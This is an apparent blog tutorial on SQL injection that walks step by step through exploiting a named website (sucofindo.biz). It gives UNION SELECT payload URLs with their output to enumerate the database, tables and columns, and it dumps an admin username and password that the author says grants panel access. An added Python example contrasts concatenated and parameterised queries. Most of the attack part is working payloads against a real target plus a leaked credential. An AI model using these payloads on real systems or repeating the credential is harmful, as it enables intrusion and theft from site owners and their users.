SQL INJECTION is a code injection technique that exploits a security vulnerability occurring in the database layer of an application, such as its queries. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements or is not strongly typed, and is thereby unexpectedly executed. It results from using poorly designed query language interpreters. In the wild, it has been noted that applications experience, on average.
So I will show you how to tell when a SQL injection vulnerability is present. I found the vulnerability while browsing a website that can be exploited with the SQL injection technique. The normal URL is http://victim.biz/?menuid=40. I tried inputting the character ' to get an error from the application, making the URL http://victim.biz/?menuid='40, and the website responded with a blank page. That means the target is vulnerable, but I had not yet found the error message.
I found the error message in the website's source code; it was hidden inside the <title> element: <title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''40' at line 1</title>. Now perform the SQL syntax to exploit the vulnerability.
First, find the number of columns in the query; the syntax is http://victim.biz/?menuid=40+order+by+2-- . Once the number of columns is found, the next syntax finds the vulnerable column: http://sucofindo.biz/?menuid=-40 UNION SELECT 1,2--
and the result is:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> SUCOFINDO || 1</title>
The vulnerable column is column 1. Now replace column 1 with SQL syntax to find out the version of the DBMS using "http://sucofindo.biz/?menuid=-40 UNION SELECT @@version(),2--", or "http://sucofindo.biz/?menuid=-40 UNION SELECT database(),2--" to find out the name of the current database.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> SUCOFINDO || websci_2</title>
The current database is websci_2. Now find the tables in the database using the syntax
http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(table_name),2 from information_schema.tables where table_schema=database()--
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> SUCOFINDO || cabang,head_slider,jasa,menu,press,propinsi,publikasi,publikasi_detil,publikasi_detil_event,sbu,solution_jasa,solution_jasa_sec,tentang_kami,user</title>
To find the columns of the user table I have to convert "user" to ASCII hex, which gives 0x75736572; the syntax is "http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(column_name),2 from information_schema.columns where table_name=0x75736572--"
The result is shown below:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> SUCOFINDO || id_user,user_id,nama,jenis_kelamin,tgl_lahir,password,tgl_create,tgl_update,aktif,id_otoritas,cabang_id,status,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_pr</title>
Now dump id_user and password using the syntax "http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(id_user,0x3a,password),2 from user--"
The result is:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> SUCOFINDO || admin:adminpa55</title>
I can log in to the admin panel of this website with the id_user and password that I found.....
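As an added illustration (not code from this post or from the site described), here is the query pattern that makes a lookup like ?menuid= injectable, beside the hardened form that enforces the integer type and binds the value as a parameter. The schema, table contents and credential are constructed for the example, and it uses SQLite in place of the target's MySQL.

```python
import sqlite3

# Constructed in-memory schema standing in for the scenario above: a menu
# table looked up by ?menuid=, and a user table holding credentials.
# The credential is a constructed sample value, not data from the page.
def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE menu (id INTEGER, title TEXT);
        INSERT INTO menu VALUES (40, 'Home');
        CREATE TABLE user (id_user TEXT, password TEXT);
        INSERT INTO user VALUES ('admin', 'sample-secret');
    """)
    return conn

def menu_title_vulnerable(conn: sqlite3.Connection, menuid: str):
    """The defect described above: the raw parameter is concatenated into
    the statement, so it is neither typed nor escaped. The database error
    text is handed back to the caller, mirroring the leaked <title> message."""
    sql = "SELECT title, id FROM menu WHERE id=" + menuid
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    return row[0] if row else None

def menu_title_safe(conn: sqlite3.Connection, menuid: str):
    """Hardened form: enforce the integer type first, then bind the value as
    a parameter so the driver never interprets it as SQL text."""
    try:
        menu_id = int(menuid)
    except ValueError:
        return None  # non-numeric input is rejected; no SQL runs at all
    row = conn.execute("SELECT title, id FROM menu WHERE id=?", (menu_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = setup()
    probe = "'40"  # the stray-quote probe from the walkthrough
    leak = "-40 UNION SELECT id_user || ':' || password, 2 FROM user--"
    for name, fn in (("vulnerable", menu_title_vulnerable), ("safe", menu_title_safe)):
        print(name, "normal:", fn(db, "40"))
        print(name, "probe:", fn(db, probe))
        print(name, "union:", fn(db, leak))
```

The vulnerable version leaks the database error on the probe and the user row on the UNION input; the hardened version answers only the legitimate integer id and returns nothing for both others.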
note:
(Never use your knowledge to do damage, because it will have fatal consequences for you; this is only a tutorial in which I show how dangerous a SQL injection attack is.)
thanks....
well... great...